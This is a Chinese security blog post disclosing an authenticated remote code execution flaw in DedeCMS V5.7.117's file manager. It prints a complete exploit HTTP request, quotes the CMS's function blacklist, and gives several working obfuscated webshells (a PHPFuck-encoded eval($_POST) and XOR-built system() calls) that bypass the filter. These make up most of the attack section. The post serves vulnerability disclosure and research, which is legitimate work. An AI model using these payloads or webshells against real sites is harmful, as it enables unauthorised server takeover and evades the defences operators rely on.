1. 首页
  2. 技术文章
  3. 正文

DedeCMS V5.7.117(最新版) RCE

    Mrxn
  • 发表于2025/3/22 08:36
  • 1489浏览
  • 2评论
  • 1小时阅读

漏洞简介

织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的php开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历多年的发展,版本无论在功能,还是在易用性方面,都有了长足的发展和进步。dede/file_manage_control.php 参数 str 过滤不完善导致经过认证的用户可向系统写入任意内容到任意文件造成RCE(绕过系统过滤)漏洞

影响版本

DedeCMS V5.7.117 (最新版,截至2025-02-19)

漏洞复现

DedeCMS V5.7.117(最新版) RCE

POST /dede/file_manage_control.php HTTP/1.1
Host: dede.test
Origin: http://dede.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2d1ca2ec9bc8151e93a7ed4c9d538f24; _csrf_name_bdcfd205=792906316d69f352fbea3d045e9d23f3; _csrf_name_bdcfd2051BH21ANI1AGD297L1FF21LN02BGE1DNG=b112b72b642019c7; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0261997adf84f9f3; DedeLoginTime=1742303377; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=f56517b699cfd4af
Referer: http://dede.test/dede/file_manage_view.php?fmdo=newfile&activepath=
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Length: 168

fmdo=edit&backurl=&token=2b18c39c9a5fda9fea94ccaec24c62a7&activepath=&filename=cmd.php&str=%3C%3F%3Dmd5%28123456%29%3Bunlink%28__FILE__%29%3B&B1=++%E4%BF%9D+%E5%AD%98++

访问 dede.test/cmd.php 成功执行PHP代码

DedeCMS V5.7.117(最新版) RCE

漏洞分析

我们尝试写入一句话webshell ,不出意外被拦截了

DedeCMS V5.7.117(最新版) RCE

搜索关键词,往上回溯,看到了拦截代码

// 不允许这些字符
$str = preg_replace("#(/\*)[\s\S]*(\*/)#i", '', $str);

global $cfg_disable_funs;
$cfg_disable_funs = isset($cfg_disable_funs) ? $cfg_disable_funs : 'phpinfo,eval,assert,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite,preg_replace';
$cfg_disable_funs = $cfg_disable_funs.',[$]GLOBALS,[$]_GET,[$]_POST,[$]_REQUEST,[$]_FILES,[$]_COOKIE,[$]_SERVER,include,require,create_function,array_map,call_user_func,call_user_func_array,array_filert,getallheaders';
foreach (explode(",", $cfg_disable_funs) as $value) {
    $value = str_replace(" ", "", $value);
    if(!empty($value) && preg_match("#[^a-z]+['\"]*{$value}['\"]*[\s]*[([{']#i", " {$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>");
    }
}
  • 过滤内容中所有多行注释
  • 动态黑名单拦截含 高危函数调用(如 eval,system,popen)
  • 超级全局变量操作(如 $_GET/$_POST
  • 敏感代码(fwrite,fopen)特征 的输入字符串,若匹配则对内容转义后终止程序
  • 动态执行函数call_user_func, create_function
  • 匹配 $GLOBALS$_POST 等变量访问
  • 匹配函数名后跟随括号(如 eval(system
  • 兼容 "eval"'system' 形式的字符串拼接绕过

但是比较搞笑的是过滤函数里的 array_filert ?? PHP 里没有这个函数吧?或许是 array_filter ?程序员手滑拼写错误?

接下来看 另一段过滤判断

if(preg_match("#^[\s\S]+<\?(php|=)?[\s]+#i", " {$str}") == TRUE) {
    if(preg_match("#[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]#iU", " {$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>");
    }
    if(preg_match("#[@][$][_0-9a-z]+[\s]*[(][\s\S]*[)]#iU", " {$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>");
    }
    if(preg_match("#[`][\s\S]*[`]#i", " {$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>");
    }
}

主要匹配三种形式的动态代码执行特征

  • PHP 开放标签

匹配文件首部或嵌入段的 PHP 解析指令

<?php / <?= / <? + 空格
  • 动态函数或变量调用
$func();         // 动态函数(如 `$x();`)
@$func(参数);    // 错误抑制符 + 动态函数(如 `@$a($_POST)`)
`命令`           // 系统命令调用(如 `rm -rf /`)

综合理解就是:如果输入内容同时包含 PHP 起始标签高危动态代码特征,则判定为恶意代码并终止程序。

但是基于字符串特征的就大概率被绕过,比如变形,编解码,加解密等等操作。

直接使用公开的 PHPFuck 项目来对之前拦截的一句话小马 @eval($_POST[1]); 编码下

<?php ((([]^[]).[][[]]^([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([].[])[([]^[[]])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]))(...((([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([].[])[([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])]))((([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]]).[][[]]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).((([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])]).(([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]]).[][[]]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]]).[][[]]).(([]^[]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])])).(([]^[[]]).[][[]]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])])))() ?>

成功写入

DedeCMS V5.7.117(最新版) RCE

访问 cmd.php 并执行 phpinfo() 成功

DedeCMS V5.7.117(最新版) RCE

或者使用PHP运算符来动态生成需要执行的函数名在调用

<? (("S" ^ "2") . ("I" ^ ":") . ("Y" ^ "*") . ("#" ^ "F") . ("A" ^ "3") . ("/" ^ "["))(${("h" ^ "7") . ("}" ^ "-") . ("o" ^ " ") . ("h" ^ ";") . ("q" ^ "%")}[1]);

DedeCMS V5.7.117(最新版) RCE

也是可以成功上传的且成功执行的

DedeCMS V5.7.117(最新版) RCE

亦或其他动态生成的亦或

<? @(("\xfa"^"\x9b").("\xab"^"\xd8").("K"^"8").("\x93"^"\xf6").("\xf6"^"\x84").("\xd3"^"\xa7"))(${("="^"b").("\xf8"^"\xa8").("%"^"j").("v"^"%").("\xde"^"\x8a")}[1]);

DedeCMS V5.7.117(最新版) RCE

参考

  • https://splitline.github.io/PHPFuck/
版权所有:Mrxn's Blog
文章标题:DedeCMS V5.7.117(最新版) RCE
文章链接:https://mrxn.net/jswz/DedeCMS-V5_7_117-RCE.html
本站文章均为原创,未经授权请勿用于任何商业用途。仅供安全研究和学习使用。若因传播、利用本文档信息而产生任何直接或间接的后果或损害,均由使用者自行承担,文章作者不为此承担任何责任。
设备上扫码阅读
手机扫码阅读

相关文章

用友NC LfwFileUploadServlet 任意文件上传漏洞

泛微e-office email.wsdl.php sql注入漏洞
评 论
avatar
zai——tao
厉害厉害,好奇这是怎么发现的
10 个月前 回复
avatar
Mrxn
@zai——tao:审得多自然就能发现!
10 个月前 回复